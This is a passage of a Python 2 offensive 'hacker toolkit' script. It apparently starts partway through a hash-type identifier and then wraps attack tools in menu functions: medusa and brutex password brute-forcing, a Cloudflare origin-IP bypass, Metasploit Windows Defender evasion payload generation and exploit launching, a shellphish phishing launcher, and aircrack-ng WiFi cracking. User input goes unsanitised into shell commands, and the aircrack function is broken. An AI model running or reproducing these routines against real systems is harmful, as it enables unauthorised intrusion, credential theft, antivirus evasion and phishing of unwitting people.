hs='a96103d267d024583d5565436e52dfb3' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106500") + def md5md5passsalt(): + hs='5848c73c2482d3c2c7b6af134ed8dd89' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106520") + def md5md5passmd5salt(): + hs='8dc71ef37197b2edba02d48c30217b32' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106540") + def md5md5saltpass(): + hs='9032fabd905e273b9ceb1e124631bd67' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106560") + def md5md5saltmd5pass(): + hs='8966f37dbb4aca377a71a9d3d09cd1ac' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106580") + def md5md5usernamepasssalt(): + hs='4319a3befce729b34c3105dbc29d0c40' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106600") + def md5md5md5pass(): + hs='ea086739755920e732d0f4d8c1b6ad8d' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106620") + def md5md5md5md5pass(): + hs='02528c1f2ed8ac7d83fe76f3cf1c133f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106640") + def md5md5md5md5md5pass(): + hs='4548d2c062933dff53928fd4ae427fc0' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106660") + def md5sha1pass(): + hs='cb4ebaaedfd536d965c452d9569a6b1e' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106680") + def md5sha1md5pass(): + hs='099b8a59795e07c334a696a10c0ebce0' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106700") + def md5sha1md5sha1pass(): + hs='06e4af76833da7cc138d90602ef80070' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106720") + def md5strtouppermd5pass(): + hs='519de146f1a658ab5e5e2aa9b7d2eec8' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106740") + + def LineageIIC4(): + hs='0x49a57f66bd3d5ba6abda5579c264a0e4' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True and hash[0:2].find('0x')==0: + jerar.append("107080") + def MD5phpBB3(): + hs='$H$9kyOtE8CDqMJ44yfn9PFz2E.L2oVzL1' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$H$')==0: + jerar.append("107040") + def MD5Unix(): + hs='$1$cTuJH0Ju$1J8rI.mJReeMvpKUZbSlY/' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$1$')==0: + jerar.append("107060") + def MD5Wordpress(): + hs='$P$BiTOhOj3ukMgCci2juN0HRbCdDRqeh.' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$P$')==0: + jerar.append("107020") + + def MD5APR(): + hs='$apr1$qAUKoKlG$3LuCncByN76eLxZAh/Ldr1' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash[0:4].find('$apr')==0: + jerar.append("108020") + + def Haval160(): + hs='a106e921284dd69dad06192a4411ec32fce83dbb' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109100") + def Haval160HMAC(): + hs='29206f83edc1d6c3f680ff11276ec20642881243' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109200") + def MySQL5(): + hs='9bb2fb57063821c762cc009f7584ddae9da431ff' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109040") + def MySQL160bit(): + hs='*2470c0c06dee42fd1618bb99005adca2ec9d1e19' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:1].find('*')==0: + jerar.append("109060") + def RipeMD160(): + hs='dc65552812c66997ea7320ddfb51f5625d74721b' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109120") + def RipeMD160HMAC(): + hs='ca28af47653b4f21e96c1235984cb50229331359' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109180") + def SHA1(): + hs='4a1d4dbc1e193ec3ab2e9213876ceb8f4db72333' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109020") + def SHA1HMAC(): + hs='6f5daac3fee96ba1382a09b1ba326ca73dccf9e7' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109140") + def SHA1MaNGOS(): + hs='a2c0cdb6d1ebd1b9f85c6e25e0f8732e88f02f96' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109220") + def SHA1MaNGOS2(): + hs='644a29679136e09d0bd99dfd9e8c5be84108b5fd' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109240") + def Tiger160(): + hs='c086184486ec6388ff81ec9f235287270429b225' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109080") + def Tiger160HMAC(): + hs='6603161719da5e56e1866e4f61f79496334e6a10' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109160") + def sha1passsalt(): + hs='f006a1863663c21c541c8d600355abfeeaadb5e4' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109260") + def sha1saltpass(): + hs='299c3d65a0dcab1fc38421783d64d0ecf4113448' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109280") + def sha1saltmd5pass(): + hs='860465ede0625deebb4fbbedcb0db9dc65faec30' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109300") + def sha1saltmd5passsalt(): + hs='6716d047c98c25a9c2cc54ee6134c73e6315a0ff' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109320") + def sha1saltsha1pass(): + hs='58714327f9407097c64032a2fd5bff3a260cb85f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109340") + def sha1saltsha1saltsha1pass(): + hs='cc600a2903130c945aa178396910135cc7f93c63' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109360") + def sha1usernamepass(): + hs='3de3d8093bf04b8eb5f595bc2da3f37358522c9f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109380") + def sha1usernamepasssalt(): + hs='00025111b3c4d0ac1635558ce2393f77e94770c5' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109400") + def sha1md5pass(): + hs='fa960056c0dea57de94776d3759fb555a15cae87' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("1094202") + def sha1md5passsalt(): + hs='1dad2b71432d83312e61d25aeb627593295bcc9a' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109440") + def sha1md5sha1pass(): + hs='8bceaeed74c17571c15cdb9494e992db3c263695' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109460") + def sha1sha1pass(): + hs='3109b810188fcde0900f9907d2ebcaa10277d10e' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109480") + def sha1sha1passsalt(): + hs='780d43fa11693b61875321b6b54905ee488d7760' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109500") + def sha1sha1passsubstrpass03(): + hs='5ed6bc680b59c580db4a38df307bd4621759324e' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109520") + def sha1sha1saltpass(): + hs='70506bac605485b4143ca114cbd4a3580d76a413' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109540") + def sha1sha1sha1pass(): + hs='3328ee2a3b4bf41805bd6aab8e894a992fa91549' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109560") + def sha1strtolowerusernamepass(): + hs='79f575543061e158c2da3799f999eb7c95261f07' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109580") + + def Haval192(): + hs='cd3a90a3bebd3fa6b6797eba5dab8441f16a7dfa96c6e641' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("110040") + def Haval192HMAC(): + hs='39b4d8ecf70534e2fd86bb04a877d01dbf9387e640366029' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("110080") + def Tiger192(): + hs='c086184486ec6388ff81ec9f235287270429b2253b248a70' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("110020") + def Tiger192HMAC(): + hs='8e914bb64353d4d29ab680e693272d0bd38023afa3943a41' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("110060") + + def MD5passsaltjoomla1(): + hs='35d1c0d69a2df62be2df13b087343dc9:BeKMviAfcXeTPTlX' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[32:33].find(':')==0: + jerar.append("112020") + + def SHA1Django(): + hs='sha1$Zion3R$299c3d65a0dcab1fc38421783d64d0ecf4113448' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:5].find('sha1$')==0: + jerar.append("113020") + + def Haval224(): + hs='f65d3c0ef6c56f4c74ea884815414c24dbf0195635b550f47eac651a' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("114040") + def Haval224HMAC(): + hs='f10de2518a9f7aed5cf09b455112114d18487f0c894e349c3c76a681' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("114080") + def SHA224(): + hs='e301f414993d5ec2bd1d780688d37fe41512f8b57f6923d054ef8e59' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("114020") + def SHA224HMAC(): + hs='c15ff86a859892b5e95cdfd50af17d05268824a6c9caaa54e4bf1514' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("114060") + + def SHA256(): + hs='2c740d20dab7f14ec30510a11f8fd78b82bc3a711abe8a993acdb323e78e6d5e' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115020") + def SHA256HMAC(): + hs='d3dd251b7668b8b6c12e639c681e88f2c9b81105ef41caccb25fcde7673a1132' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115120") + def Haval256(): + hs='7169ecae19a5cd729f6e9574228b8b3c91699175324e6222dec569d4281d4a4a' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115040") + def Haval256HMAC(): + hs='6aa856a2cfd349fb4ee781749d2d92a1ba2d38866e337a4a1db907654d4d4d7a' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115140") + def GOSTR341194(): + hs='ab709d384cce5fda0793becd3da0cb6a926c86a8f3460efb471adddee1c63793' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115060") + def RipeMD256(): + hs='5fcbe06df20ce8ee16e92542e591bdea706fbdc2442aecbf42c223f4461a12af' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115080") + def RipeMD256HMAC(): + hs='43227322be1b8d743e004c628e0042184f1288f27c13155412f08beeee0e54bf' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115160") + def SNEFRU256(): + hs='3a654de48e8d6b669258b2d33fe6fb179356083eed6ff67e27c5ebfa4d9732bb' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115100") + def SNEFRU256HMAC(): + hs='4e9418436e301a488f675c9508a2d518d8f8f99e966136f2dd7e308b194d74f9' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115180") + def SHA256md5pass(): + hs='b419557099cfa18a86d1d693e2b3b3e979e7a5aba361d9c4ec585a1a70c7bde4' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115200") + def SHA256sha1pass(): + hs='afbed6e0c79338dbfe0000efe6b8e74e3b7121fe73c383ae22f5b505cb39c886' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115220") + + def MD5passsaltjoomla2(): + hs='fb33e01e4f8787dc8beb93dac4107209:fxJUXVjYRafVauT77Cze8XwFrWaeAYB2' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[32:33].find(':')==0: + jerar.append("116020") + def SAM(): + hs='4318B176C3D8E3DEAAD3B435B51404EE:B7C899154197E8A2A33121D76A240AB5' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash.islower()==False and hash[32:33].find(':')==0: + jerar.append("116040") + + def SHA256Django(): + hs='sha256$Zion3R$9e1a08aa28a22dfff722fad7517bae68a55444bb5e2f909d340767cec9acf2c3' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:6].find('sha256')==0: + jerar.append("117020") + + def RipeMD320(): + hs='b4f7c8993a389eac4f421b9b3b2bfb3a241d05949324a8dab1286069a18de69aaf5ecc3c2009d8ef' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("118020") + def RipeMD320HMAC(): + hs='244516688f8ad7dd625836c0d0bfc3a888854f7c0161f01de81351f61e98807dcd55b39ffe5d7a78' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("118040") + + def SHA384(): + hs='3b21c44f8d830fa55ee9328a7713c6aad548fe6d7a4a438723a0da67c48c485220081a2fbc3e8c17fd9bd65f8d4b4e6b' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("119020") + def SHA384HMAC(): + hs='bef0dd791e814d28b4115eb6924a10beb53da47d463171fe8e63f68207521a4171219bb91d0580bca37b0f96fddeeb8b' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("119040") + + def SHA256s(): + hs='$6$g4TpUQzk$OmsZBJFwvy6MwZckPvVYfDnwsgktm2CckOlNJGy9HNwHSuHFvywGIuwkJ6Bjn3kKbB6zoyEjIYNMpHWBNxJ6g.' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$6$')==0: + jerar.append("120020") + + def SHA384Django(): + hs='sha384$Zion3R$88cfd5bc332a4af9f09aa33a1593f24eddc01de00b84395765193c3887f4deac46dc723ac14ddeb4d3a9b958816b7bba' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:6].find('sha384')==0: + print " [+] SHA-384(Django)" + jerar.append("121020") + + def SHA512(): + hs='ea8e6f0935b34e2e6573b89c0856c81b831ef2cadfdee9f44eb9aa0955155ba5e8dd97f85c73f030666846773c91404fb0e12fb38936c56f8cf38a33ac89a24e' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("122020") + def SHA512HMAC(): + hs='dd0ada8693250b31d9f44f3ec2d4a106003a6ce67eaa92e384b356d1b4ef6d66a818d47c1f3a2c6e8a9a9b9bdbd28d485e06161ccd0f528c8bbb5541c3fef36f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("122060") + def Whirlpool(): + hs='76df96157e632410998ad7f823d82930f79a96578acc8ac5ce1bfc34346cf64b4610aefa8a549da3f0c1da36dad314927cebf8ca6f3fcd0649d363c5a370dddb' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("122040") + def WhirlpoolHMAC(): + hs='77996016cf6111e97d6ad31484bab1bf7de7b7ee64aebbc243e650a75a2f9256cef104e504d3cf29405888fca5a231fcac85d36cd614b1d52fce850b53ddf7f9' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("122080") + + + print logo + while True: + jerar=[] + print """ + -------------------------------------------------------------------------""" + hash = raw_input(" HASH: ") + ADLER32(); CRC16(); CRC16CCITT(); CRC32(); CRC32B(); DESUnix(); DomainCachedCredentials(); FCS16(); GHash323(); GHash325(); GOSTR341194(); Haval128(); Haval128HMAC(); Haval160(); Haval160HMAC(); Haval192(); Haval192HMAC(); Haval224(); Haval224HMAC(); Haval256(); Haval256HMAC(); LineageIIC4(); MD2(); MD2HMAC(); MD4(); MD4HMAC(); MD5(); MD5APR(); MD5HMAC(); MD5HMACWordpress(); MD5phpBB3(); MD5Unix(); MD5Wordpress(); MD5Half(); MD5Middle(); MD5passsaltjoomla1(); MD5passsaltjoomla2(); MySQL(); MySQL5(); MySQL160bit(); NTLM(); RAdminv2x(); RipeMD128(); RipeMD128HMAC(); RipeMD160(); RipeMD160HMAC(); RipeMD256(); RipeMD256HMAC(); RipeMD320(); RipeMD320HMAC(); SAM(); SHA1(); SHA1Django(); SHA1HMAC(); SHA1MaNGOS(); SHA1MaNGOS2(); SHA224(); SHA224HMAC(); SHA256(); SHA256s(); SHA256Django(); SHA256HMAC(); SHA256md5pass(); SHA256sha1pass(); SHA384(); SHA384Django(); SHA384HMAC(); SHA512(); SHA512HMAC(); SNEFRU128(); SNEFRU128HMAC(); SNEFRU256(); SNEFRU256HMAC(); Tiger128(); Tiger128HMAC(); Tiger160(); Tiger160HMAC(); Tiger192(); Tiger192HMAC(); Whirlpool(); WhirlpoolHMAC(); XOR32(); md5passsalt(); md5saltmd5pass(); md5saltpass(); md5saltpasssalt(); md5saltpassusername(); md5saltmd5pass(); md5saltmd5passsalt(); md5saltmd5passsalt(); md5saltmd5saltpass(); md5saltmd5md5passsalt(); md5username0pass(); md5usernameLFpass(); md5usernamemd5passsalt(); md5md5pass(); md5md5passsalt(); md5md5passmd5salt(); md5md5saltpass(); md5md5saltmd5pass(); md5md5usernamepasssalt(); md5md5md5pass(); md5md5md5md5pass(); md5md5md5md5md5pass(); md5sha1pass(); md5sha1md5pass(); md5sha1md5sha1pass(); md5strtouppermd5pass(); sha1passsalt(); sha1saltpass(); sha1saltmd5pass(); sha1saltmd5passsalt(); sha1saltsha1pass(); sha1saltsha1saltsha1pass(); sha1usernamepass(); sha1usernamepasssalt(); sha1md5pass(); sha1md5passsalt(); sha1md5sha1pass(); sha1sha1pass(); sha1sha1passsalt(); sha1sha1passsubstrpass03(); sha1sha1saltpass(); sha1sha1sha1pass(); sha1strtolowerusernamepass() + + if len(jerar)==0: + print "" + print " Not Found." + elif len(jerar)>2: + jerar.sort() + print "" + print "Possible Hashs:" + print "[+] ",algorithms[jerar[0]] + print "[+] ",algorithms[jerar[1]] + print "" + print "Least Possible Hashs:" + for a in range(int(len(jerar))-2): + print "[+] ",algorithms[jerar[a+2]] + else: + jerar.sort() + print "" + print "Possible Hashs:" + for a in range(len(jerar)): + print "[+] ",algorithms[jerar[a]] +#------------------# +#FIND HASH TYPE END# + + +#RESTART SCRIPT START# +#--------------------# +def restart(): + os.system("clear") + os.system("cd /root/hackers-tool-kit && python htk.py") +#------------------# +#RESTART SCRIPT END# + + +#MEDUSA AUTOMATED START# +#----------------------# +def medusa(): + k = raw_input("Target Host: ") + u = raw_input("User: ") + p = raw_input("Wordlist: ") + os.system("cat /root/hackers-tool-kit/tools/medusamods.txt") + print "\n" + m = raw_input("Module: ") + n = raw_input("Port: ") + a = 'medusa -h {0} -u {1} -P {2} -M {3} -n {4}'.format(k,u,p,m,n) + os.system(a) +#--------------------# +#MEDUSA AUTOMATED END# + + +#WAF DETECTER START# +#------------------# +def wafwoof(): + j = raw_input("Enter Target: ") + k = 'wafw00f {0}'.format(j) + os.system(k) +#----------------# +#WAF DETECTER END# + + +#CLOUDFLARE BYPASS START# +#-----------------------# +def cloud(): + + subdomainlist = ["ftp", "cpanel", "webmail" , "mail" , "www", "www1", "www2", "www3", "www4", "www5","ns1", "ns2" , "forums" , "blog"] + + print ('\033[1m' + "CLOUDFLARE BYPASS SCRIPT ") + + host = raw_input("Enter Target: ") + for sublist in subdomainlist: + try: + hosts = str(sublist) + "." + str(host) + showip = socket.gethostbyname(str(hosts)) + print " Cloudflare has begun to be bypassed "+str(showip)+' :| '+str(hosts) + except: + pass + + print ( '\033[93m' + "Credit Goes To: tugrulbey.com") + print ( '\033[92m' + "Credit Goes To: tztugrulbey@protonmail.com") +#---------------------# +#CLOUDFLARE BYPASS END# + + +#BRUTEFORCE ALL SERVICES ON WEB START# +#------------------------------------# +def brutex(): + k = raw_input("Target: ") + p = raw_input("Port: ") + a = 'brutex {0} {1}'.format(k,p) + os.system(a) +#----------------------------------# +#BRUTEFORCE ALL SERVICES ON WEB END# + + +#METERPRETER HELP MENU START# +#---------------------------# +def methelp(): + os.system("cat /root/hackers-tool-kit/tools/meterpreter.txt") +#-------------------------# +#METERPRETER HELP MENU END# + + +#WINDOWS DEFENDER BYPASS START# +#-----------------------------# +def winbyp(): + os.system("cat /root/hackers-tool-kit/tools/payloads.txt") + pay = raw_input("Payload: ") + port = raw_input("Port: ") + name = raw_input("File Name: ") + os.system('echo "use evasion/windows/windows_defender_exe\n" > winbyp.rc') + os.system('echo "set payload {0}\n" >> winbyp.rc'.format(pay)) + os.system('echo "set LHOST 127.0.0.1\n" >> winbyp.rc') + os.system('echo "set LPORT {0}\n" >> winbyp.rc'.format(port)) + os.system('echo "set filename {0}.exe\n" >> winbyp.rc'.format(name)) + os.system('echo "run\n" >> winbyp.rc') + os.system("service postgresql restart") + os.system('msfconsole -r winbyp.rc') + os.system('rm -rf winbyp.rc') +#---------------------------# +#WINDOWS DEFENDER BYPASS END# + + +#USE A EXPLOIT START# +#-------------------# +def exploit(): + os.system("cat /root/hackers-tool-kit/tools/exploits.txt") + print "\n" + f = raw_input("Select Exploit: ") + os.system('echo "use {0}\n" >> exploit.rc'.format(f)) + os.system('echo "show options\n" >> exploit.rc'.format(f)) + os.system("service postgresql restart") + os.system('msfconsole -r exploit.rc') + os.system('rm -rf exploit.rc') +#-----------------# +#USE A EXPLOIT END# + + +#PHISHING AUTOMATED START# +#------------------------# +def phish(): + os.system("bash /root/shellphish/shellphish.sh") +#----------------------# +#PHISHING AUTOMATED END# + + +#LIST DATABASE INFO START# +#------------------------# +def datalist(): + os.system('echo "hosts\n" >> data.rc') + os.system('echo "services\n" >> data.rc') + os.system("service postgresql restart") + os.system('msfconsole -r data.rc') + os.system('rm -rf data.rc') +#----------------------# +#LIST DATABASE INFO END# + + +#ALL METASPLOIT EVASIONS START# +#-----------------------------# +def msfev(): + os.system("service postgresql start") + os.system("""msfconsole -x 'show evasion'""") +#---------------------------# +#ALL METASPLOIT EVASIONS END# + + +#FULLY UPDATE YOUR OS START# +#--------------------------# +def upgrade(): + os.system("apt update && apt upgrade") +#------------------------# +#FULLY UPDATE YOUR OS END# + + +#USE A NMAP SCRIPT START# +#-----------------------# +def nscript(): + os.system("cat /root/hackers-tool-kit/tools/scripts.txt") + print "\n" + j = raw_input(G+"Select Script:\033[0m ") + k = raw_input(G+"Target:\033[0m ") + a = 'nmap --script {0} {1}'.format(j,k) + os.system(a) +#---------------------# +#USE A NMAP SCRIPT END# + + +#GET HOST SSH VERSION START# +#--------------------------# +def sshver(): + f = raw_input(G+"Target: \033[0m") + g = raw_input(G+"Port: \033[0m") + t = raw_input(G+"Threads: \033[0m") + b = raw_input(G+"Timeout: \033[0m") + os.system('echo "use auxiliary/scanner/ssh/ssh_version\n" >> sshver.rc') + os.system('echo "set RHOSTS {0}\n" >> sshver.rc'.format(f)) + os.system('echo "set RPORT {0}\n" >> sshver.rc'.format(g)) + os.system('echo "set THREADS {0}\n" >> sshver.rc'.format(t)) + os.system('echo "set TIMEOUT {0}\n" >> sshver.rc'.format(b)) + os.system('echo "show options\n" >> sshver.rc') + os.system('echo "run\n" >> sshver.rc') + os.system("service postgresql restart") + os.system('msfconsole -r sshver.rc') + os.system('rm -rf sshver.rc') +#------------------------# +#GET HOST SSH VERSION END# + + +#USE PROXYCHAINS FOR WEB START# +#-----------------------------# +def chains(): + h = raw_input("Enter Browser: ") + j = raw_input("Enter Website: ") + a = 'proxychains {0} {1}'.format(h,j) + os.system(a) +#---------------------------# +#USE PROXYCHAINS FOR WEB END# + + +#GET HOST MYSQL VERSION START# +#----------------------------# +def mysqlv(): + f = raw_input(G+"Target: \033[0m") + g = raw_input(G+"Port: \033[0m") + t = raw_input(G+"Threads: \033[0m") + os.system('echo "use auxiliary/scanner/mysql/mysql_version\n" >> mysqlv.rc') + os.system('echo "set RHOSTS {0}\n" >> mysqlv.rc'.format(f)) + os.system('echo "set RPORT {0}\n" >> mysqlv.rc'.format(g)) + os.system('echo "set THREADS {0}\n" >> mysqlv.rc'.format(t)) + os.system('echo "show options\n" >> mysqlv.rc') + os.system('echo "run\n" >> mysqlv.rc') + os.system("service postgresql restart") + os.system('msfconsole -r mysqlv.rc') + os.system('rm -rf mysqlv.rc') +#--------------------------# +#GET HOST MYSQL VERSION END# + + +#CONNECT TO A HOST START# +#-----------------------# +def connect(): + h = raw_input("Enter Host: ") + print "\n" + print " How would you like to connect?" + print "---------------------------------------" + print "ssh: Secure Shell | Default Port = 22" + print "---------------------------------------" + print "telnet: Network Virtual Terminal | Default Port = 23" + print "---------------------------------------" + j = raw_input("Select Protocol: ") + a = '{0} {1}'.format(j,h) + os.system(a) +#---------------------# +#CONNECT TO A HOST END# + + + +#OPEN NEW TERMINAL START# +#-----------------------# +def terminal(): + os.system("gnome-terminal") +#---------------------# +#OPEN NEW TERMINAL END# + + +#AIRCRACK-NG [WIFI HACK] AUTOMATED START# +#---------------------------------------# +def aircrack(): + b = raw_input(G+"BSSID: \033[0m") + e = raw_input(G+"ESSID: \033[0m") + w = raw_input(G+"Wordlist: \033[0m") + h = raw_input(G+"Handshake file: \033[0m") + os.system("iwconfig") + i = raw_input(G+"Interface: \033[0m") + a = 'aircrack-ng -b {0} -e {1} -w {2} {3} {4}' + os.system(a) +#-------------------------------------# +#AIRCRACK-NG [WIFI HACK] AUTOMATED END# + + +#GET SOURCE CODE OF WEB START# +#----------------------------# +def source(): + t = raw_input(B+"Target:\033[0m ") + print Y+"\nWould you like to save source code in a file?\n\033[0m" + q = raw_input(R+"[y/n]:\033[0m ") + if q == "n": + an = 'curl {0}'.format(t) + os.system(an) + if q == "y": + ay = 'curl {0} >> /root/{1}.txt'.format(t,t) + os.system(ay) + print Y+"\nfile saved > /root/{0}.txt\033[0m".format(t) +#--------------------------# +#GET SOURCE CODE OF WEB END# + + +#WEB DIRECTORY SCAN START# +#------------------------# +def dirscan(): + t = raw_input(B+"Target URL:\033[91m ") + print "\033[0m" + a = 'dirb {0}'.format(t) + os.system(a) +#----------------------# +#WEB DIRECTORY SCAN END# + + + +#APACHE SERVER START# +#-------------------# +def aserver(): + gw = os.popen("ip -4 route show default").read().split() + s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) + s.connect((gw[2], 0)) + ipaddr = s.getsockname()[0] + print Y+"Starting Server\033[0m..." + os.system("service apache2 start") + br = raw_input(G+"Browser: \033[0m") + a = '{0} {1}'.format(br,ipaddr) + os.system(a) + stop = raw_input("hit enter to stop server: ") + print Y+"Stopping Server\033[0m..." + os.system("service apache2 stop") +#-----------------# +#APACHE SERVER END# + + +#CLEAR ALL START# +#---------------# +def clearall(): + os.system("clear") +#-------------# +#CLEAR ALL END# + + +#RUN A FILE START# +#----------------# +def run(): + print Y+"what program do you want to run the file with Example: python" + p = raw_input(N+"Program: ") + print "\n" + print Y+"Example 1: /root/hi/hello.py/ \033[94mExample 2: hello.py\033[0m" + print "\n" + f = raw_input("Enter File: ") + print "\n" + print Y+"would you like to add arguments when running the file 